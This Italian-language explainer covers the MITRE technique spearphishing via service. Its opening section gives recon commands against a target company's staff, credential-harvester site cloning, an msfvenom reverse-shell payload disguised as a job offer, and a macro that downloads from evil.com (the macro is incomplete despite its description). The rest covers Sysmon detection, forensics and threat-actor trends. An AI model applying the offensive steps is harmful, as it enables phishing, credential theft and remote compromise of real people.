Spearphishing via Servizi Esterni: Phishing via Service (T1566.003)

Per comprendere questa tecnica, iniziamo creando un profilo LinkedIn credibile. Utilizzerai strumenti OSINT per raccogliere informazioni sui dipendenti target e costruire una narrativa convincente.

Il primo passo consiste nell'identificare i bersagli attraverso ricerche mirate:

theHarvester -d targetcompany.com -b linkedin
linkedin2username.py -u targetcompany

Una volta identificati i profili, puoi utilizzare Social Engineering Toolkit (SET) per creare landing page convincenti. Configura SET per clonare una pagina di login legittima:

setoolkit
1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner

Per simulare l'invio di file malevoli attraverso servizi di messaggistica, puoi utilizzare Empire o Cobalt Strike. Genera un payload che simuli un documento di offerta di lavoro:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o job_offer.exe

Incorpora il payload in un documento Office utilizzando macro VBA. Il codice seguente dimostra come automatizzare il download e l'esecuzione:

Sub Document_Open()
    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
    Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
    xHttp.Open "GET", "https://evil.com/payload.exe", False
    xHttp.Send
End Sub

Per testare la persistenza post-compromissione, simula le tecniche usate da ToddyCat che distribuiva il malware Ninja via Telegram. Configura un bot Telegram per la distribuzione automatica di payload compressi.

La detection efficace richiede monitoraggio su più livelli. Inizia configurando regole per identificare login anomali su servizi esterni durante l'orario lavorativo.

Monitora i processi figli sospetti lanciati da applicazioni di produttività. Un pattern classico è outlook.exe → powershell.exe o firefox.exe → cmd.exe. Configura Sysmon per catturare questi eventi:

<ProcessCreate onmatch="include">
    <ParentImage condition="contains any">outlook.exe;thunderbird.exe;chrome.exe;firefox.exe</ParentImage>
    <Image condition="contains any">powershell.exe;cmd.exe;wscript.exe;cscript.exe</Image>
</ProcessCreate>

Implementa correlazioni temporali tra download di file e successive connessioni outbound. Se un file viene scaricato da Gmail e entro 5 minuti si osserva traffico verso IP non categorizzati, genera un alert ad alta priorità.

Per ridurre i falsi positivi, crea whitelist dinamiche basate sul comportamento storico degli utenti. Se un dipendente IT usa regolarmente PowerShell dopo aver aperto email, il suo profilo comportamentale deve rifletterlo. Utilizza machine learning per identificare deviazioni significative dal baseline individuale.

Configura il monitoraggio dei certificati SSL/TLS per identificare connessioni verso domini con certificati self-signed o scaduti subito dopo l'accesso a servizi di messaggistica. Storm-1811 ha dimostrato l'efficacia di Microsoft Teams come vettore, quindi includi anche le piattaforme di collaboration aziendale nel perimetro di monitoraggio.

L'analisi forense di questi attacchi richiede la correlazione di artefatti provenienti da browser, client email e servizi cloud. Inizia esaminando la cronologia del browser per identificare accessi a servizi esterni sospetti.

Su Windows, recupera gli artefatti di navigazione:

C:\Users\[username]\AppData\Local\Google\Chrome\User Data\Default\History
C:\Users\[username]\AppData\Roaming\Mozilla\Firefox\Profiles\[profile]\places.sqlite

Analizza i download recenti correlando timestamp con l'esecuzione di processi sospetti. PowerShell fornisce tracce dettagliate negli event log con EventCode 4104 per script block logging e EventCode 4103 per module logging.

La ricostruzione della timeline deve includere l'analisi dei file di cache delle applicazioni di messaggistica. WhatsApp Web lascia tracce significative in:

C:\Users\[username]\AppData\Roaming\WhatsApp\Cache

Per Linux, esamina i log di auditd cercando syscall execve precedute da operazioni di download. Il pattern tipico mostra open() su file temporanei seguito da chmod +x e successiva esecuzione:

ausearch -sc execve -ts today | grep -B5 -A5 "downloaded"

Durante Operation Dream Job, Lazarus Group lasciava tracce distintive nei job file di stampa fasulli. Cerca file PDF o DOC con metadata anomali che indicano creazione rapida o tool di generazione automatica. L'analisi dei prefetch files può rivelare l'ordine esatto di esecuzione degli strumenti post-compromissione.

APT29 ha innovato utilizzando Constant Contact per campagne di phishing sofisticate. Questo gruppo russo preferisce servizi legittimi per mascherare le comunicazioni C2, indicando una possibile evoluzione verso piattaforme di email marketing automatizzate.

Lazarus Group dimostra persistenza nell'uso di LinkedIn per Operation Dream Job. Il gruppo nordcoreano target specificamente i settori aerospace e defense con false offerte di lavoro. I loro payload evolvono rapidamente, ma mantengono pattern riconoscibili nel social engineering iniziale.

Magic Hound combina WhatsApp e LinkedIn in campagne multi-canale. Questo approccio iraniano suggerisce una strategia di ridondanza: se un canale fallisce, l'altro mantiene il contatto con la vittima. Monitora correlazioni tra account LinkedIn compromessi e successive comunicazioni WhatsApp.

EXOTIC LILY rappresenta l'evoluzione tattica sfruttando le notifiche email dei servizi di file sharing. Questo bypass intelligente aggira completamente i gateway email aziendali. L'overlap nei tool tra questi gruppi suggerisce possibili collaborazioni o mercati underground di strumenti specializzati.

I trend geografici mostrano gruppi est-europei e mediorientali che prediligono Telegram, mentre attori asiatici favoriscono LinkedIn. Moonstone Sleet ha recentemente introdotto software trojanizzato distribuito via social media, indicando una convergenza tra spearphishing e supply chain attacks.

Framework MITRE ATT&CK T1566.003. Operation Dream Job (C0022) documentata nel periodo 2019-2020 con targeting dei settori defense e aerospace. Riferimenti ai gruppi APT29, Lazarus Group, Magic Hound e relative campagne. Detection strategies DET0115 per monitoraggio cross-platform di spearphishing via servizi esterni.